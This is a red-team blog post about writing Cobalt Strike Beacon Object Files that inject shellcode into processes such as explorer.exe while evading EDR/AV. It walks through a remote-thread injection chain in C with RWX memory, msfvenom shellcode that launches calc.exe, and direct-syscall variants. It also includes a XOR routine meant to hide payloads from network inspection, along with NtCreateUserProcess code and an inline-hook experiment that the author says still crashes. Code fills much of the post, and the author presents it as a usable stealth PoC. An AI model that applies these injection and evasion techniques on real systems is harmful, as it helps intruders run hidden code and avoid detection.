I still haven’t solved the memcpy
mystery from last week, but I did succeed in developing some Beacon Object Files that help Red Teams fly under the radar.
1. Printf(“Hello again, world!\n”);
Last week I talked about Virtual Address Space, Userland-hooking, how Windows organizes and differentiates between User Space and Kernel Space and how I can leverage the entire situation using direct syscalls to bypass EDR/AV.
Today I’ll dive deeper into the intricacies of process injection.
The process of process injection (see what I did there) usually follows a few basic steps.
- Get a handle to the process we want to inject into
- Allocate some memory into the target process with READ, WRITE, EXECUTE permissions
- Write our malicious code to the allocated memory
- Get the target process to execute our malicious code
Easier said than done. Processes don’t particularly like it when you start messing with their memory and threads, and more often than not will crash. With these basics in mind, I started working on my own Beacon Object File that could inject shellcode into a process. All I needed were some WIN32 API functions that would perform the aforementioned steps.
There are some great resources out there on the topic of process injection, like Windows Process Injection in 2019 by Safebreach Labs. I decided to start with the easiest and most stable approach: spawning my own process. The way I wanted to approach this, was to stay away from loading DLLs and instead inject raw shellcode.
“What is shellcode and what does it look like?”, I can hear you ask. Shellcode is a tiny program, written directly in assembly in the form of opcodes and operands. Opcodes, or operation codes, are the hexadecimal representation of assembly instructions, operands are the hexadecimal respresentation of CPU registers, flags, numbers, and so on.
For all my payloads I will be using x64 shellcode to start calc.exe
, the Windows calculator.
//generated with: msfvenom -p windows/x64/exec CMD=calc.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
2. 𝅘𝅥 𝅘𝅥𝅮 Allocate, Write, Inject, Repeat 𝅘𝅥𝅯 𝅘𝅥𝅯
First things first. We need to spawn a new process to inject into. To spawn a new process, we can use the CreateProcessA
function contained in kernel32.dll
. We only need a few basic parameters to start a new instance of calc.exe
.
//holds information about the newly created process, like: process ID, main thread ID, and handles
PROCESS_INFORMATION pi;
//specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time
STARTUPINFO si;
//set the memory to 0
memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi));
//create a new instance of windows calculator
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
To use our newly spawned process, we need to obtain a handle to it. We can use the OpenProcess
function contained in kernel32.dll
. For the sake of keeping this blogpost somewhat short (who am I kidding), we will assume we know the process ID (PID) of our calc.exe
process. In practice I utilise code to enumerate all the running processes on the machine until I have found calculator.exe
.
DWORD pid = 6969; //calc.exe
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
Armed with the process handle, we can now allocate some memory, which we will later use to write our shellcode to. To do this, we use the VirtualAllocEx
function contained in kernel32.dll
. It is important to specify PAGE_EXECUTE_READWRITE
, so we later have permission to execude the code located in this memory block. By default, memory that is writeable is not executable and vice versa.
LPVOID shellcode_address = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
The final step before execution, is writing our shellcode to the memory block we just allocated in the target process. To do this, we use the WriteProcessMemory
function contained in kernel32.dll
.
WriteProcessMemory(hProcess, shellcode_address, shellcode, sizeof(shellcode), NULL);
Now all that’s left is to make the target process execute our shellcode. There are multiple ways to go about this, but to keep things easy we will use the CreateRemoteThread
function contained in kernel32.dll
to start up a new thread in the target process which will then execute our shellcode.
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcode_address, shellcode_address, 0, NULL);
CloseHandle(hProcess); //clean up
3. Look mom, no process!
Yikes, kernel32.dll
. This wouldn’t fly under any radar.
You’re right. The method we used earlier to spawn a new process and inject our shellcode into it, is probably the most well known, noisy, easily detected, non-sophisticated way of doing things. But we need to learn how to walk before we can run.
To spice things up and make something that will actually bypass EDR/AV, I needed to make some changes. First and foremost I had to get rid of the process creation. Spawning new processes is incredibly noisy and obvious. Instead we can scour the lands of Microsoft Windows in search for a process that blends in well and is usually present on any Windows system (looking at you explorer.exe
).
So, to start things of, I’ll enumerate all the running processes on the system until I find explorer.exe
, grab its process ID (PID) and use it to obtain a process handle. To obtain the handle I use NtOpenProcess
contained in ntdll.dll
as a direct syscall.
The next steps in the process remain the same, although I use the ntdll.dll
versions of the API calls, namely NtAllocateVirtualMemory
and NtWriteVirtualMemory
, again as direct syscalls.
To wrap up and execute the shellcode, I use the NtCreateThreadEx
function contained in ntdll.dll
to create a new remote thread in explorer.exe
, and clean up our mess with NtClose
to close any remaining handles.
4. Let’s cram this into a BOF
BOFs are supposed to be tiny, hence they use dynamic imports to resolve functions. Since I’m using direct syscalls which can’t be dynamically resolved, I have about 900 lines of overhead code that mainly hold the different structures, flags and definitions as well as the raw assembly for the syscalls. These are generated by SysWhispers and InlineWhispers.
The remaining kernel32.dll
and libc
functions are dynamically imported in a format provided by Cobalt Strike.
//dynamic import for kernel32.dll function
DECLSPEC_IMPORT WINBASEAPI return_type_here WINAPI KERNEL32$FunctionNameHere(PARAMETER_TYPES_HERE);
//dynamic import for libc function
DECLSPEC_IMPORT return_type_here MSVCRT$FunctionNameHere(PARAMETER_TYPES_HERE);
5. Script absolutely EVERYTHING
A good exploit wouldn’t be complete without a great script to go with it. Luckily for me, Cobalt Strike supports something called Aggressor Script which is build on top of Sleep. This allows me to handle payload/shellcode creation/insertion, encryption, and custom user parameters for process creation and/or targetting.
So I created this neat little dialog that allows the user to specify the payload either via file or as base64 encoded string and customize some process spawning properties.
The script also performs a 1 byte XOR encryption routine on the payload. This is done to make it harder for appliances to detect shellcode being transported over the network. It looks like this:
sub xor
{
# $1 = shellcode
# $2 = key
local('$buf $key');
$key = "nice try ;)"
for($i = 0; $i < strlen($1); $i++)
{
$buf .= chr(asc(charAt($1, $i)) ^ $key);
}
return $buf;
}
I considered implementing RC4 encryption instead, but since I also have to decrypt the payload on the other side, the overhead is not worth the added benefits. Afterall we’re not going for uncrackable encryption, we just want to mask the shellcode for network inspection.
After confirming the dialog, the payload is successfully injected into explorer.exe
and I get a beacon callback.
6. And for my final trick, I will…
…spawn a process.
Huh? You just got rid of that.
As mentioned before, process injection is extremely volatile, and more often than not causes the target process to crash. So I set out on an adventure to spawn my own processes using NtCreateUserProcess
as a direct syscall, to hopefully get past EDR/AV and not stir up too much noise.
In the days of Windows XP, process creation used to happen in a couple steps, using NtCreateProcess
, RtlCreateUserThread
and some other functions like NtOpenFile
and NtCreateSection
. When Microsoft released the epic failure that was Vista, they also changed how process creation works and chucked all the different API calls together into one single call, namely NtCreateUserProcess
. When we spawned calc.exe
using CreateProcessA
, different API’s were called shown in the image below.
At the very bottom we end up with NtCreateUserProcess
which will then talk to the kernel or perform some magic to switch to x64 mode.
After a lot of digging for process parameters, their structures and how they need to be initialized, I managed to come up with code that successfully spawns a new calc.exe
process in a suspended state with the help of Microwave89’s research on the topic.
<VARIABLE DECLARATION TRUNCATED FOR SPACE>
///We should supply a minimal environment (environment variables). Following one is simple yet fits our needs.
char data[2 * sizeof(ULONGLONG)] = { 'Y', 0x00, 0x3D, 0x00, 'Q', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
protectionInfo.Signer = (UCHAR)PsProtectedSignerNone;
protectionInfo.Type = (UCHAR)PsProtectedTypeNone;
protectionInfo.Audit = 0;
RtlSecureZeroMemory(&userParams, sizeof(RTL_USER_PROCESS_PARAMETERS));
RtlSecureZeroMemory(&attrList, sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE));
RtlSecureZeroMemory(&procInfo, sizeof(PS_CREATE_INFO));
userParams.Length = sizeof(RTL_USER_PROCESS_PARAMETERS);
userParams.MaximumLength = sizeof(RTL_USER_PROCESS_PARAMETERS);
attrList.TotalLength = sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE);
procInfo.Size = sizeof(PS_CREATE_INFO);
userParams.Environment = (WCHAR*)data;
userParams.EnvironmentSize = sizeof(data);
userParams.Flags = RTL_USER_PROCESS_PARAMETERS_NORMALIZED;
attrList.Attributes[0].Attribute = PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE);
attrList.Attributes[0].Size = pProcessImageName->Length;
attrList.Attributes[0].Value = (ULONG_PTR)pProcessImageName->Buffer;
status = NtCreateUserProcess(&hProcess, &hThread, MAXIMUM_ALLOWED, MAXIMUM_ALLOWED, NULL, NULL, 0, THREAD_CREATE_FLAGS_CREATE_SUSPENDED, &userParams, &procInfo, &attrList);
However the newly spawned process crashes immediately when execution is resumed, so it is not fit for injection.
7. I’m the EDR now
In an attempt to find a workaround for the extremely limited function parameters, I decided to try and hook NtCreateUserProcess
, so when I spawn a process using CreateProcessA
, my hook will intercept the call, and I can replace NtCreateUserProcess
with my own version, but preserve the function parameters passed by CreateProcessA
. Using LoadLibraryA
and GetProcAddress
I can find the memory address associated with NtCreateUserProcess
. Then I’ll read and save the first 6 bytes of the function, and replace them with assembly code to push the address to my trampoline function.
int main()
{
HINSTANCE library = LoadLibraryA("ntdll.dll");
SIZE_T bytesRead = 0;
// get address of the NtCreateUserProcess function in memory
NtCreateUserProcessAddr = GetProcAddress(library, "NtCreateUserProcess");
// save the first 6 bytes of the original NtCreateUserProcess function - will need for unhooking
ReadProcessMemory(GetCurrentProcess(), (LPCVOID)NtCreateUserProcessAddr, NtCreateUserProcessOriginalBytes, 6, &bytesRead);
// create a patch "push <address of trampoline function>; ret"
// 0x68 = push imm32, 0xC3 = ret
// wonky cast to get around C++ ISO rules - https://stackoverflow.com/questions/45134220/how-to-convert-a-pointer-of-type-void-to-void
void *trampolineAddr = reinterpret_cast<void*>(&trampoline);
char patch[6] = { 0 };
memcpy_s(patch, 1, "\x68", 1);
memcpy_s(patch + 1, 4, &trampolineAddr, 4);
memcpy_s(patch + 5, 1, "\xC3", 1);
// patch NtCreateUserProcess
WriteProcessMemory(GetCurrentProcess(), (LPVOID)NtCreateUserProcessAddr, patch, sizeof(patch), &bytesWritten);
// Execute code after hooking
PROCESS_INFORMATION pi;
STARTUPINFO si;
memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi));
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
return 0;
}
This is what the original NtCreateUserProcess
looks like in WinDbg when disassembled.
After executing main()
and patching the function, the bytes at address 0x1b7ae600
are now my \x68
or push
and the memory address to my trampoline function 0x02164000
.
The bytes at 0x1b7ae605
are now \xc3
or ret
.
When CreateProcessA
calls NtCreateUserProcess
, it will instead jmp
to my hook trampoline function. The trampoline function acts as a wrapper around my hook function and pushes all the registers onto the stack to preserve them. After it has pushed all the registers it will then call my hooked version of NtCreateUserProcess
.
__declspec(naked) NTSTATUS trampoline(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PPS_CREATE_INFO CreateInfo, PPS_ATTRIBUTE_LIST AttributeList)
{
printf("Pushing registers\n");
asm("push rax;"
"push rbx;"
"push rcx;"
"push rdx;"
"push r8;"
"push r9;"
"push r10;"
"push r11;"
"push r12;"
"push r13;"
"push r14;"
"push r15;"
"push rsi;"
"push rdi;"
"push rbp;"
"push rsp;");
NTSTATUS status = HookedNtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, ProcessFlags, ThreadFlags, ProcessParameters, CreateInfo, AttributeList);
return status;
}
My HookedNtCreateUserProcess
function first pops and restores all the registers that were pushed onto the stack by the trampoline function, then it will unpatch the original NtCreateUserProcess
and call my direct syscall version of NtCreateUserProcess
and pass the parameters we got from CreateProcessA
.
NTSTATUS __stdcall HookedNtCreateUserProcess(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PPS_CREATE_INFO CreateInfo, PPS_ATTRIBUTE_LIST AttributeList)
{
printf("Hello from hooked NtCreateUserProcess ;)\n");
printf("Popping registers\n");
asm("pop rsp;"
"pop rbp;"
"pop rdi;"
"pop rsi;"
"pop r15;"
"pop r14;"
"pop r13;"
"pop r12;"
"pop r11;"
"pop r10;"
"pop r9;"
"pop r8;"
"pop rdx;"
"pop rcx;"
"pop rbx;"
"pop rax;");
// unpatch
WriteProcessMemory(GetCurrentProcess(), (LPVOID)NtCreateUserProcessAddr, NtCreateUserProcessOriginalBytes, sizeof(NtCreateUserProcessOriginalBytes), &bytesWritten);
// call the original
printf("Calling original\n");
return NtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, ProcessFlags, ThreadFlags, ProcessParameters, CreateInfo, AttributeList);
}
8. Wrapping up
Unfortunately there are still issues with the inline assembly code for NtCreateUserProcess
and the fact I’m messing up the stack. I suspect there are certain registers that CreateProcessA
expects to remain constant throughout its call to NtCreateUserProcess
, hence the trampoline function, but something is still off resulting in a segfault.
Fun fact, in x32 assembly there is something called pushad
and popad
which pushes and pops all the registers to and from the stack. When x64 came around the corner, they needed space for new instructions, and pushad
and popad
were sacrificed.
I’m pretty proud I’ve gotten this far. In my humble opinion I have developed a useful, working PoC that can be used by Cobalt Strike to perform stealthy(ish) process injection.
NtDelayExecution(FALSE, 604800000);